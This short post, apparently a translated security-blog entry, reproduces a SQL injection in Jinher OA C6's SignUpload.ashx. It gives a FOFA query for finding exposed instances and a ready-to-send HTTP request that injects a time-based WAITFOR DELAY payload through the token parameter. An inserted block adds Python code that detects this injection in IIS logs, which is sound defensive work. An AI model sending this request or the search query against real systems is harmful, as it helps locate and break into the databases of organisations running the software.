FOFA
app="金和网络-金和OA"
Vulnerability Reproduction
POC
GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%205%27+--%20and%201=1_123_123&filename=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537
Accept-Encoding: gzip
Connection: close
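A defender-side check for the request above, added here as an example and not part of the original post: it scans web server log lines for SignUpload.ashx requests whose token parameter carries SQL syntax, and notes whether the response time matches the 5-second delay. The log layout, the sample lines, the benign token value and the function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in a simplified IIS W3C layout (assumed field order):
# date time cs-method cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status time-taken
2024-01-01 10:00:01 GET /C6/Jhsoft.Web.ask/SignUpload.ashx token=abc_123_123&filename=1 200 40
2024-01-01 10:00:05 GET /C6/Jhsoft.Web.ask/SignUpload.ashx token=1%3BWAITFOR+DELAY+%270%3A0%3A%205%27+--%20and%201=1_123_123&filename=1 200 5031
2024-01-01 10:00:12 GET /C6/index.aspx id=1 200 12
"""

# SQL syntax that has no place in a token value (assumption: legitimate
# tokens never contain quotes, semicolons, comment markers or T-SQL keywords).
SUSPICIOUS = re.compile(r"[;'\"]|--|/\*|\b(?:waitfor|delay|select|union|exec)\b", re.I)

def scan(log_text, delay_ms=5000):
    """Return one finding per SignUpload.ashx request with a suspicious token."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # skip W3C header lines and malformed rows
        date, time, _method, stem, query, _status, taken = parts
        # IIS paths are case-insensitive, so compare in lower case.
        if not stem.lower().endswith("/signupload.ashx"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        for token in parse_qs(query, keep_blank_values=True).get("token", []):
            if SUSPICIOUS.search(token):
                findings.append({
                    "when": f"{date} {time}",
                    "token": token,
                    # A response time at or above the injected delay suggests
                    # the statement actually executed on the database.
                    "delayed": taken.isdigit() and int(taken) >= delay_ms,
                })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A finding with `delayed` set to true is the higher-priority case, since it indicates the endpoint is unpatched and the delay ran.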
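nuclei run result
The nuclei PoC has been uploaded to Knowledge Planet (知识星球).
Originally published on the WeChat official account CatalyzeSec: Jinher OA C6 SignUpload SQL Injection Vulnerability Reproduction and POC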